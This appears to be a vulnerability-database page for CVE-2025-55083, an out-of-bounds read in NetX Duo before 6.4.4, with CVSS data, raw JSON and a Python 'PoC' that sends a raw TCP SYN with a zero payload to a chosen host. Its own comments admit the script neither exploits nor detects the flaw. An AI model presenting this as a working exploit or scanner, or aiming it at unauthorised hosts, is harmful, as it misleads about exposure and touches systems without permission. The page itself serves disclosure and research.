Security Vulnerability Report
CVE-2025-55083 CVSS 5.3 MEDIUM

CVE-2025-55083

Published: 2025-10-15 15:16:04
Last Modified: 2025-10-21 17:04:27

Description

In NetX Duo versions before 6.4.4, a component of Eclipse Foundation ThreadX, an incorrect bounds check resulted in an out-of-bounds read that is out by two.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:* - VULNERABLE
Eclipse ThreadX NetX Duo < 6.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
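# CVE-2025-55083 PoC - NetX Duo Out-of-Bounds Read
# This PoC demonstrates the concept of triggering an out-of-bounds read
# in NetX Duo versions before 6.4.4 by sending a crafted network packet.
#
# NOTE(review): the script below is a generic skeleton. It sends one TCP SYN
# segment followed by 64 zero bytes and never reads a reply, so running it
# neither confirms nor rules out the flaw. The advisory text on this page does
# not say which NetX Duo parser holds the incorrect bound check, and nothing
# here is tied to one. To assess exposure, compare the deployed NetX Duo
# version with the fixed release (6.4.4, vendor advisory GHSA-9hw5-4xcv-jprm).
import socket
import struct
import sys


def craft_malicious_packet(target_ip, target_port):
    """Send one hand-built TCP SYN segment with a 64-byte zero payload.

    The segment is built from fixed values (source port 12345, sequence and
    acknowledgement numbers 0, 20-byte header, SYN flag, window 65535,
    checksum 0, urgent pointer 0) and handed to a raw IPPROTO_TCP socket.
    No length field is altered and no response is read.

    Args:
        target_ip: Destination address passed to ``sendto``.
        target_port: Destination port; written into the TCP header and
            passed to ``sendto``.

    Returns:
        None. When the raw socket cannot be opened for lack of privileges,
        a message is printed and the function returns without sending.

    Raises:
        struct.error: ``target_port`` does not fit an unsigned 16-bit field.
    """
    # TCP header fields (simplified, fixed values).
    src_port = 12345
    dst_port = target_port
    seq_num = 0
    ack_num = 0
    data_offset = 5  # 5 x 32-bit words = 20 bytes (no options)
    flags = 0x02  # SYN flag
    window = 65535
    checksum = 0  # left at zero; not computed here
    urgent = 0

    # Pack before acquiring the socket: an out-of-range port then fails with
    # struct.error without a privileged raw socket having been opened (the
    # original opened the socket first and leaked it on this error path).
    tcp_header = struct.pack('!HHIIBBHHH',
                             src_port, dst_port,
                             seq_num, ack_num,
                             (data_offset << 4), flags,
                             window, checksum, urgent)

    # Placeholder payload: 64 zero bytes, not derived from the advisory.
    malicious_payload = b'\x00' * 64
    packet = tcp_header + malicious_payload

    # Raw sockets require root/admin privileges.
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
    except PermissionError:
        print("[!] Raw socket requires root/admin privileges")
        return

    # The context manager closes the socket even when sendto() raises.
    with sock:
        sock.sendto(packet, (target_ip, target_port))
        print(f"[*] Malicious packet sent to {target_ip}:{target_port}")


def detect_vulnerability(target_ip, target_port):
    """Print two status lines and call ``craft_malicious_packet``.

    Despite the name, no detection takes place: the function reads no reply,
    inspects no target state and returns None in every case. Its output must
    not be read as a finding about the target.

    Args:
        target_ip: Forwarded unchanged to ``craft_malicious_packet``.
        target_port: Forwarded unchanged to ``craft_malicious_packet``.
    """
    print(f"[*] Testing {target_ip}:{target_port} for CVE-2025-55083")
    print("[*] Vulnerable versions: NetX Duo < 6.4.4")
    craft_malicious_packet(target_ip, target_port)


if __name__ == "__main__":
    # A missing argument or a non-numeric port both fall back to the usage
    # text instead of ending in a traceback.
    try:
        target_ip = sys.argv[1]
        target_port = int(sys.argv[2])
    except (IndexError, ValueError):
        print("Usage: python poc.py <target_ip> <target_port>")
        print("Note: Requires root/admin privileges for raw socket access")
    else:
        detect_vulnerability(target_ip, target_port)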

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55083", "sourceIdentifier": "[email protected]", "published": "2025-10-15T15:16:04.217", "lastModified": "2025-10-21T17:04:27.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In NetX Duo version before 6.4.4, the component of Eclipse Foundation ThreadX, there was an incorrect bound check resulting it out by two out of bound read."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email 
protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.4.4.202503", "matchCriteriaId": "24743F34-C00F-4CB2-BCEE-2BB29FA265CB"}]}]}], "references": [{"url": "https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-9hw5-4xcv-jprm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}